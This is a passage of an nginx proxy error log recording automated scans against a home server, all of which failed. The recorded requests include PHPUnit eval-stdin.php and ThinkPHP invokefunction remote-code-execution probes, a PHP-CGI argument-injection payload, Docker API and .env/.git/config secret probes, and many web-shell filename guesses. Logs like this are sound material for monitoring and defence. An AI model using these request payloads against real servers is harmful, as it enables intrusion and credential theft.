directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:46:08 [error] 244#244: *14872 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:46:12 [error] 244#244: *14872 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:46:13 [error] 244#244: *14872 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:46:21 [error] 244#244: *14872 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:46:21 [error] 244#244: *14872 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:46:24 [error] 244#244: *14872 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:04:19 [error] 244#244: *14876 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:49:36 [error] 245#245: *14889 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:32 [error] 245#245: *14896 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:34 [error] 245#245: *14896 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:34 [error] 245#245: *14896 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:35 [error] 245#245: *14896 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:35 [error] 245#245: *14896 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:36 [error] 245#245: *14896 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:36 [error] 245#245: *14896 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:37 [error] 245#245: *14896 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:37 [error] 245#245: *14896 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:38 [error] 245#245: *14896 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:39 [error] 245#245: *14896 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:39 [error] 245#245: *14896 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:40 [error] 245#245: *14896 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:40 [error] 245#245: *14896 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:41 [error] 245#245: *14896 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:42 [error] 245#245: *14896 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:42 [error] 245#245: *14896 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:43 [error] 245#245: *14896 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:44 [error] 245#245: *14896 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:44 [error] 245#245: *14896 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:45 [error] 245#245: *14896 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:45 [error] 245#245: *14896 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:46 [error] 245#245: *14896 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:46 [error] 245#245: *14896 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:47 [error] 245#245: *14896 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:48 [error] 245#245: *14896 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:49 [error] 245#245: *14896 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:50 [error] 245#245: *14896 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:50 [error] 245#245: *14896 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:51 [error] 245#245: *14896 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:52 [error] 245#245: *14896 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:52 [error] 245#245: *14896 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:53 [error] 245#245: *14896 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:54 [error] 245#245: *14896 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:54 [error] 245#245: *14896 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:55 [error] 245#245: *14896 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:55 [error] 245#245: *14896 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:56 [error] 245#245: *14896 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:57 [error] 245#245: *14896 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:57 [error] 245#245: *14896 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 21:53:59 [error] 245#245: *14896 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 102.244.97.186, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 22:35:17 [error] 246#246: *14914 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 22:42:55 [error] 246#246: *14918 open() "/var/www/html/.well-known/security.txt" failed (2: No such file or directory), client: 162.216.149.244, server: localhost-nginx-proxy-manager, request: "GET /.well-known/security.txt HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 23:03:07 [error] 253#253: *15267 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 13.74.146.113, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/27 23:32:40 [error] 294#294: *15486 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 213.209.159.181, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.215.191" +2026/01/27 23:47:31 [error] 295#295: *15547 open() "/var/www/html/.env" failed (2: No such file or directory), client: 146.190.164.150, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.215.191" +2026/01/27 23:47:32 [error] 295#295: *15548 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 146.190.164.150, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.215.191" +2026/01/28 00:14:43 [error] 295#295: *15560 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 204.76.203.6, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 00:18:38 [error] 295#295: *15561 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:38 [error] 295#295: *15561 open() "/var/www/html/zwso.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /zwso.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:38 [error] 295#295: *15561 open() "/var/www/html/wp-admin/css/colors/blue/index.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/colors/blue/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:39 [error] 295#295: *15561 open() "/var/www/html/class19.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /class19.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:39 [error] 295#295: *15561 open() "/var/www/html/class20.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /class20.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:39 [error] 295#295: *15561 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /admin.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:39 [error] 295#295: *15561 open() "/var/www/html/randkeyword.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /randkeyword.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:39 [error] 295#295: *15561 open() "/var/www/html/fwe.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /fwe.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:40 [error] 295#295: *15561 open() "/var/www/html/images/m.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /images/m.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:40 [error] 295#295: *15561 open() "/var/www/html/g.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /g.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:40 [error] 295#295: *15561 open() "/var/www/html/tx1.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /tx1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:40 [error] 295#295: *15561 open() "/var/www/html/xv.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /xv.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:41 [error] 295#295: *15561 open() "/var/www/html/x56.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /x56.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:41 [error] 295#295: *15561 open() "/var/www/html/htaccess.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /htaccess.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:41 [error] 295#295: *15561 open() "/var/www/html/readme.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /readme.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:41 [error] 295#295: *15561 open() "/var/www/html/x50.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /x50.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:42 [error] 295#295: *15561 open() "/var/www/html/fv.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /fv.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:42 [error] 295#295: *15561 open() "/var/www/html/file.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /file.php? HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:42 [error] 295#295: *15561 open() "/var/www/html/lsd.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /lsd.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:42 [error] 295#295: *15561 open() "/var/www/html/as.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /as.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:43 [error] 295#295: *15561 open() "/var/www/html/wsd.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wsd.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:43 [error] 295#295: *15561 open() "/var/www/html/gtc.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /gtc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:43 [error] 295#295: *15561 open() "/var/www/html/atx.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /atx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:43 [error] 295#295: *15561 open() "/var/www/html/z60.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /z60.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:44 [error] 295#295: *15561 open() "/var/www/html/403.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /403.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:44 [error] 295#295: *15561 open() "/var/www/html/m.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /m.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:44 [error] 295#295: *15561 open() "/var/www/html/themes.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /themes.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:44 [error] 295#295: *15561 open() "/var/www/html/wp-admin/maint/about.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:45 [error] 295#295: *15561 open() "/var/www/html/wp-admin/network/wp-conflg.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/network/wp-conflg.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:45 [error] 295#295: *15561 open() "/var/www/html/click.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /click.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:45 [error] 295#295: *15561 open() "/var/www/html/install.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /install.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:45 [error] 295#295: *15561 open() "/var/www/html/lv.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /lv.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:46 [error] 295#295: *15561 open() "/var/www/html/simple.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /simple.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:46 [error] 295#295: *15561 open() "/var/www/html/css.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /css.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:46 [error] 295#295: *15561 open() "/var/www/html/cong.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /cong.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:46 [error] 295#295: *15561 open() "/var/www/html/wp-includes/images/wp-login.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/images/wp-login.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:47 [error] 295#295: *15561 open() "/var/www/html/cong.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /cong.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:47 [error] 295#295: *15561 open() "/var/www/html/w.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /w.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:47 [error] 295#295: *15561 open() "/var/www/html/404.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /404.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:47 [error] 295#295: *15561 open() "/var/www/html/0x.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /0x.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:48 [error] 295#295: *15561 open() "/var/www/html/css.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /css.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:48 [error] 295#295: *15561 open() "/var/www/html/222.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /222.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:48 [error] 295#295: *15561 open() "/var/www/html/wp-content/index.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-content/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:48 [error] 295#295: *15561 open() "/var/www/html/wp-admin/maint/maint.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/maint.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:49 [error] 295#295: *15561 open() "/var/www/html/classwithtostring.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /classwithtostring.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:49 [error] 295#295: *15561 open() "/var/www/html/abcd.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /abcd.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:49 [error] 295#295: *15561 open() "/var/www/html/autoload_classmap.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /autoload_classmap.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:49 [error] 295#295: *15561 open() "/var/www/html/inputs.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /inputs.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:49 [error] 295#295: *15561 open() "/var/www/html/about.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:50 [error] 295#295: *15561 open() "/var/www/html/alfa.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /alfa.php HTTP/1.1", host: 